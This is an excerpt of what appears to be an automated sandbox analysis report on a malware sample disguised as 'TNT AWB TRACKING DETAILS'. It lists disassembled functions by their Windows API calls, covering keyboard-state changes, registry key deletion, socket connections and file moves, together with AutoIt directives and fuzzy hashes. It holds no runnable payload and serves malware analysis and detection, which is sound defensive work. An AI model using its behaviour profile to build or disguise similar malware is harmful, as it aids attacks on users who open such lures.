Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
Instruction ID: 036da37dc320323e592a723b7dac0c840f1fa2adbc9a223882e9802bc4df41a7
Opcode Fuzzy Hash: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
Instruction Fuzzy Hash: 045115606147D63DFB3A52388C45BBABEE9EB06304F0889C9E1D4968D3D2E8DCC8D751

Function 00B00D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B00DA5
GetKeyboardState.USER32(?), ref: 00B00DBA
SetKeyboardState.USER32(?), ref: 00B00E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B00E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B00E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B00EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B00EC9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
Instruction ID: 9ed882a1c9bc499eb7d25f7d815e647ebe4e15f18b41f8173dfebbf99ad2cd06
Opcode Fuzzy Hash: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
Instruction Fuzzy Hash: 5C5107A09287D63DFB366774CC45BBA7EE9EB06300F0889D9E1D4564C2C795AC88E760

Function 00B055FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B0560A
_wcsncpy.LIBCMT ref: 00B0563F
_wcsncpy.LIBCMT ref: 00B05671
_wcsncpy.LIBCMT ref: 00B056A4
_wcsncpy.LIBCMT ref: 00B056E6
_wcsncpy.LIBCMT ref: 00B05720
_wcsncpy.LIBCMT ref: 00B0574F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: dfe7dde4c3befd724e74415e2c990be8abd1ef986320a00170fe8f68e299661d
Instruction ID: 9bf32385618dd3575f28fce23e312efc5d14a7a79e4b3bc8ca83a52ce624379f
Opcode Fuzzy Hash: dfe7dde4c3befd724e74415e2c990be8abd1ef986320a00170fe8f68e299661d
Instruction Fuzzy Hash: 0841B866C5061876CB11EBB48C46FCFB7FC9F04310F51855AE504E3161FB34A645C7AA

Function 00B03671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03697,?), ref: 00B0468B

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03697,?), ref: 00B046A4

lstrcmpiW.KERNEL32(?,?), ref: 00B036B7
_wcscmp.LIBCMT ref: 00B036D3
MoveFileW.KERNEL32(?,?), ref: 00B036EB
_wcscat.LIBCMT ref: 00B03733
SHFileOperationW.SHELL32(?), ref: 00B0379F

Strings

\*.*, xrefs: 00B0372D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 85e11041a844eee1c4332f74868630c9bd9b8a5e970b2ff3823ded9ae8551fdc
Instruction ID: 25004652ad8a49fa08d760267bd6ca7069fa6e8f6cf1152b9a98a7951a9a81ee
Opcode Fuzzy Hash: 85e11041a844eee1c4332f74868630c9bd9b8a5e970b2ff3823ded9ae8551fdc
Instruction Fuzzy Hash: 674181B1508344AEC751EF64C445ADF7BECEF89780F4008AEB49AC3291EB35D689C756

Function 00B27291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B272AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27351
IsMenu.USER32(?), ref: 00B27369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B273B1
DrawMenuBar.USER32 ref: 00B273C4

Strings

0, xrefs: 00B2729E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 78aae74fb15e720c2003e1a25729bc8733b236f74ad8765a6c3a4a6b978b12eb
Instruction ID: 41b0ce8ebca2cbc75d30acb128975d97f9e1c82b11015d1e9ac9ab99dd26d5d1
Opcode Fuzzy Hash: 78aae74fb15e720c2003e1a25729bc8733b236f74ad8765a6c3a4a6b978b12eb
Instruction Fuzzy Hash: 96415871A44209EFDB20CF50E884EAABBF8FB08310F1485A9FD4997250CB30AD11DF58

Function 00B20FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B20FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B20FFE
FreeLibrary.KERNEL32(00000000), ref: 00B210B5

Part of subcall function 00B20FA5: RegCloseKey.ADVAPI32(?), ref: 00B2101B
Part of subcall function 00B20FA5: FreeLibrary.KERNEL32(?), ref: 00B2106D
Part of subcall function 00B20FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B21090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B21058

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 30ee4d228a1ae4678946995ff178f5dd56dd3e5b060890e01db114e46cf963b9
Instruction ID: 33b62a31fe88cd7fe3b17deb4c75190d75dedf44d0e014c91f565ae0d61fec44
Opcode Fuzzy Hash: 30ee4d228a1ae4678946995ff178f5dd56dd3e5b060890e01db114e46cf963b9
Instruction Fuzzy Hash: 40310D71911119BFDB259F94EC89EFFB7BCEF18300F0005B9E505A3151EA749E869BA0

Function 00B262CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B262EC
GetWindowLongW.USER32(013F5638,000000F0), ref: 00B2631F
GetWindowLongW.USER32(013F5638,000000F0), ref: 00B26354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B26386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B263B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00B263C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B263DB

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 616cad1d50c139d4a9570a636a257512653fb8a238f4919b7b948363bffda2b6
Instruction ID: 6d74f52a505e0b8fb98fce105177d7067914c18e8ef0a86f1b5476c215bb13bd
Opcode Fuzzy Hash: 616cad1d50c139d4a9570a636a257512653fb8a238f4919b7b948363bffda2b6
Instruction Fuzzy Hash: 4B311130640265AFDB21CF18EC84F6937E1FB8A714F1901A8F9499F2B2CB71A851DB95

Function 00AFDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDB54
SysAllocString.OLEAUT32(00000000), ref: 00AFDB57
SysAllocString.OLEAUT32(?), ref: 00AFDB75
SysFreeString.OLEAUT32(?), ref: 00AFDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00AFDBA3
SysAllocString.OLEAUT32(?), ref: 00AFDBB1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 3ece0390d46f5d9e742e1d8316020aaede155970ccaa077d19c03ec5a76bc0c7
Instruction ID: 7e95f54336d2774804254c7346cf9530c0273c5e09e9e41e45d4f0ddde7273f6
Opcode Fuzzy Hash: 3ece0390d46f5d9e742e1d8316020aaede155970ccaa077d19c03ec5a76bc0c7
Instruction Fuzzy Hash: BC21923660021EAFDF11EFE8DC88DBB73ADEB09360B018579FA14DB250DA749C418760

Function 00B16173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B17DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B161C6
WSAGetLastError.WSOCK32(00000000), ref: 00B161D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B1620E
connect.WSOCK32(00000000,?,00000010), ref: 00B16217
WSAGetLastError.WSOCK32 ref: 00B16221
closesocket.WSOCK32(00000000), ref: 00B1624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B16263

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5f6166e87ff207fdd36c9553b9f2102582e4eaeb323f4ae4e78d8cc32e43ad12
Instruction ID: e300836170da4d6e886631008df8c46fa2c22d1458bf02f4b441296ef8b793d1
Opcode Fuzzy Hash: 5f6166e87ff207fdd36c9553b9f2102582e4eaeb323f4ae4e78d8cc32e43ad12
Instruction Fuzzy Hash: D1319E31600108ABDF20AF64CC85BFA7BFDEF45720F4440A9F905EB291DB74AC458BA1

Function 00AFF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AFF671
__wcsnicmp.LIBCMT ref: 00AFF692
__wcsnicmp.LIBCMT ref: 00AFF6AC

Strings

#OnAutoItStartRegister, xrefs: 00AFF6A6
#notrayicon, xrefs: 00AFF669
#requireadmin, xrefs: 00AFF68C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 3abdbb15ebba38679838d4ab652048bd8840424447451ffdd8c55de955a60463
Instruction ID: c0d2883d2b0f6d57bb766317108915bb8c4a02eda0b01f0450a0e3ffdafcf452
Opcode Fuzzy Hash: 3abdbb15ebba38679838d4ab652048bd8840424447451ffdd8c55de955a60463
Instruction Fuzzy Hash: 832146722042556ED620FB74AD03FBBB3E8EF55340F15403AFA46C71A1EB909D41C395

Function 00AFDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDC2F
SysAllocString.OLEAUT32(00000000), ref: 00AFDC32
SysAllocString.OLEAUT32 ref: 00AFDC53
SysFreeString.OLEAUT32 ref: 00AFDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00AFDC76
SysAllocString.OLEAUT32(?), ref: 00AFDC84

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f56b5d69f75e53ca2adfc26f6c06608a1d4c3bb42e9a55d72167b2a1df4a1044
Instruction ID: 31e065ace8e9f1dc5fd0231f89013e79ce16706fed396a1d5e965e2885a73752
Opcode Fuzzy Hash: f56b5d69f75e53ca2adfc26f6c06608a1d4c3bb42e9a55d72167b2a1df4a1044
Instruction Fuzzy Hash: 99216035604209AF9B21AFF8DC89DBB77ADEB09360B108135FA14DB260DAB4DC42C764

Function 00B275CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B27632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B2763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B2764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B27659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B27665

Strings

Msctls_Progress32, xrefs: 00B27603

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 69ab265506c7617df9b80b18c1c383f43133bf5d33785f17924464da2674c988
Instruction ID: b57ddffe1b61278e29847fff3515fbcbfa679272279638c3247ca6986be9d5af
Opcode Fuzzy Hash: 69ab265506c7617df9b80b18c1c383f43133bf5d33785f17924464da2674c988
Instruction Fuzzy Hash: 4811B6B1150129BFEF119F64DC85EE77F6DEF08798F014114BA48A60A0CB729C21DBA4

Function 00AC9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00AC9AE6

Part of subcall function 00AC3187: EncodePointer.KERNEL32(00000000), ref: 00AC318A
Part of subcall function 00AC3187: __initp_misc_winsig.LIBCMT ref: 00AC31A5
Part of subcall function 00AC3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AC9EA0
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AC9EB4
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AC9EC7
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AC9EDA
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AC9EED
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AC9F00
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00AC9F13
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AC9F26
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AC9F39
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AC9F4C
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AC9F5F
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AC9F72
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AC9F85
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AC9F98
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AC9FAB
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AC9FBE

__mtinitlocks.LIBCMT ref: 00AC9AEB
__mtterm.LIBCMT ref: 00AC9AF4

Part of subcall function 00AC9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AC9AF9,00AC7CD0,00B5A0B8,00000014), ref: 00AC9C56
Part of subcall function 00AC9B5C: _free.LIBCMT ref: 00AC9C5D
Part of subcall function 00AC9B5C: DeleteCriticalSection.KERNEL32(00B5EC00,?,?,00AC9AF9,00AC7CD0,00B5A0B8,00000014), ref: 00AC9C7F

__calloc_crt.LIBCMT ref: 00AC9B19
__initptd.LIBCMT ref: 00AC9B3B
GetCurrentThreadId.KERNEL32 ref: 00AC9B42

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: c0a6684e3b48f0b0f7f3aedfe37746e18cd0c959b5ebe29eeced65f2317efbce
Instruction ID: c160710fade67906d87b428ab082093f8c5d93761b8f3b008fe9e596125923fc
Opcode Fuzzy Hash: c0a6684e3b48f0b0f7f3aedfe37746e18cd0c959b5ebe29eeced65f2317efbce
Instruction Fuzzy Hash: E7F06D325097116AEA347B78BD0BF4B2694AF02771B234A2EF464960D2EE60994245A4

Function 00AC406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AC3F85), ref: 00AC4085
GetProcAddress.KERNEL32(00000000), ref: 00AC408C
EncodePointer.KERNEL32(00000000), ref: 00AC4097
DecodePointer.KERNEL32(00AC3F85), ref: 00AC40B2

Strings

combase.dll, xrefs: 00AC4080
RoUninitialize, xrefs: 00AC4074

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 5b433d0ff98b4fdad435d09df596d04c4bd153cf6bb993786863848d5be069f3
Instruction ID: 558d7e0cfe71fa2bc1ce92bcb19207c40e345ec9c1dd1799aa2e944fb229c09e
Opcode Fuzzy Hash: 5b433d0ff98b4fdad435d09df596d04c4bd153cf6bb993786863848d5be069f3
Instruction Fuzzy Hash: DFE09270581301EBEA20AF61ED09B553AF4BB09B42F104038F501F30E0CFBA4601CA19

Function 00B064B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B0660B
_memmove.LIBCMT ref: 00B06546

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

_memmove.LIBCMT ref: 00B065B9
_memmove.LIBCMT ref: 00B066A0
_memmove.LIBCMT ref: 00B066B9
_memmove.LIBCMT ref: 00B066D5

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 0b60bd368bc712a7ea268781fc090c68f80eefd966a978ec10e3bac08ccfbdc0
Instruction ID: 7ba5bef4cebde0c47ae6289ee7d60b7e6bf0a36e0b55bf0537f609058f94d6e6
Opcode Fuzzy Hash: 0b60bd368bc712a7ea268781fc090c68f80eefd966a978ec10e3bac08ccfbdc0
